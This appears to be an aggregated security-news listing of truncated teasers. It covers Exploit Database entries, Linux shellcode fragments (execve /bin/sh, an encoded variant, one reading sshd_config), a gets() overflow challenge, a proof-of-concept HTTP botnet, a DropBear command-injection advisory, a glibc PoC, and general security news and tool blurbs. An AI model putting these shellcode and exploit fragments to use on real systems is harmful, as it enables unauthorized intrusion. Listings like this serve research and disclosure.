exploit-database

This is an official repository of The Exploit Database, a project sponsored by Offensive Security. The repository contains exploits, shellcodes, and papers for various vulnerabilities in different software and systems. The exploits are categorized by operating system, software, and vulnerability...

Vulnerability Spotlight: Remote code execution bug in SQLite

Cory Duplantis of Cisco Talos discovered this vulnerability. Executive summary SQLite contains an exploitable use-after-free vulnerability that could allow an attacker to gain the ability to remotely execute code on the victim machine. SQLite is a client-sidedatabase management system contained i...

BoF-Challenge2

On this simple stack-based buffer overflow you need to identify the vulnerable function and the buffer to overflow, then inject your payload and get a local shell. include include void func char buf100; getsbuf; printf"You entered: %s\n", buf; int mainint argc, char argv func; return 0;...

Chafer APT Takes Aim at Diplomats in Iran with Improved Custom Malware

UPDATE An Iran-linked APT known as Chafer has been spotted targeting various entities based in Iran with an enhanced version of a custom malware that takes a very unique approach to communication by using the Microsoft Background Intelligent Transfer Service BITS mechanism over HTTP. Meanwhile th...

Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes

/ Linux/x86 - execve/bin/cat /etc/ssh/sshdconfig Shellcode 44 Bytes Author: Goutham Madhwaraj Tested on: i686 GNU/Linux Shellcode Length: 44 ShoutOut - BarrierSec gcc -fno-stack-protector -z execstack loader-bind.c -o Disassembly of section .text: 08048080 : 8048080: 31 c0 xor eax,eax 8048082: 50...

UBoat - HTTP Botnet Project

A POC HTTP Botnet designed to replicate a full weaponised commercial botnet. Disclaimer This project should be used for authorized testing or educational purposes only. The main objective behind creating this offensive project was to aid security researchers and to enhance the understanding of...

Detecting Kernel Memory Disclosure – Whitepaper

Posted by Mateusz Jurczyk, Project Zero Since early 2017, we have been working on Bochspwn Reloaded – a piece of dynamic binary instrumentation built on top of the Bochs IA-32 software emulator, designed to identify memory disclosure vulnerabilities in operating system kernels. Over the course of...

Linux/x86 execve /bin/sh Encoded Shellcode (44 bytes)

/ ; Title : Execve /bin/sh Shellcode encoded with ROT-13 + RShift-2 + XOR ; Date : April, 2018 ; Author : Nuno Freitas ; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-shellcode-encoder/ ; Twitter : @nunof11 ; SLAE ID : SLAE-1112 ; Size : 44 bytes ; Tested on : i686 GNU/Linux...

CVE-2017-18190

CVE-2017-18190 affects the CUPS printing system. Connected sources confirm a vulnerability where a localhost.localdomain whitelist entry in valid_host() (scheduler/client.c) in CUPS before 2.2.2 allows remote attackers to execute arbitrary IPP commands by sending POST requests to the CUPS daemon ...

Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)

Linux/x86-64 - Execute /bin/sh Shellcode 24 bytes. Shellcode exploit for Linuxx86-64 platform / global start section .text start: push 59 pop rax cdq push rdx mov rbx,0x68732f6e69622f2f push rbx push rsp pop rdi push rdx push rdi push rsp pop rsi syscall / include include char code =...

Researcher Claims Samsung's Tizen OS is Poorly Programmed; Contains 27,000 Bugs!

A researcher has claimed that Samsung's Tizen operating system that runs on millions of Samsung products is so poorly programmed that it could contain nearly 27,000 programming errors, which could also lead to thousands of vulnerabilities. Tizen is a Linux-based open-source operating system backe...

High Performance DNS Stub Resolver: MassDNS

A high performance DNS stub resolver in C MassDNS is a simple high-performance DNS stub resolver targetting those who seek to resolve a massive amount of domain names in the order of millions or even billions. Without special configuration, MassDNS is capable of resolving over 100,000,000 domains...

Open Source CAN Network Analysis: BUSMASTER

Open Source CAN Network Analysis BUSMASTER is an open source PC software for the design, monitoring, analysis, and simulation of CAN networks. Using its powerful functions and user-programmability one can simulate CAN system of any complexity. Additionally it provides options to analyze data byte...

Warning! This Cross-Platform Malware Can Hack Windows, Linux and OS X Computers

Unlike specially crafted malware specifically developed to take advantage of Windows operating system platform, cyber attackers have started creating cross-platform malware for wider exploitation. Due to the rise in popularity of Mac OS X and other Windows desktop alternatives, hackers have begun...

Multi Gigabit Packet Capturing: PFQ

PFQ is a functional networking framework designed for the Linux operating system that allows efficient packets capture/transmission 10G and beyond, in-kernel functional processing and packets steering across sockets/end-points. PFQ is highly optimized for multi-core architecture, as well as for...

Learn C++ - Dangerous filesystem permissions, WebView code execution vulnerabilities

HackApp vulnerability scanner discovered that application Learn C++ published at the 'play' market has multiple vulnerabilities...

[SECURITY] Fedora 23 Update: gummi-0.6.6-1.fc23

Gummi is a LaTeX editor written in the C programming language using the GTK+ interface toolkit. It was designed with simplicity and the novice user in mind, but also offers features that speak to the more advanced user...

[SECURITY] Fedora 22 Update: gummi-0.6.6-1.fc22

Gummi is a LaTeX editor written in the C programming language using the GTK+ interface toolkit. It was designed with simplicity and the novice user in mind, but also offers features that speak to the more advanced user...

DropBearSSHD 2015.71 - Command Injection

Exploit for linux platform in category remote exploits VuNote ============ Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116 Version: 0.2 Date: Mar 3rd, 2016 Tag: dropbearsshd xauth command injection may lead to forced-command bypass Overview -------- Name: dropbear...

glibc catopen() Unbounded Stack Allocations

glibc catopen Multiple unbounded stack allocations URL: https://cxsecurity.com/issue/WLB-2016010149 --------------------------------------- PoC: include include include int main char buff; buff=malloc11111111; memsetbuff,'A',11111110; buff11111110='\0'; catopenbuff, NLCATLOCALE; return 0;...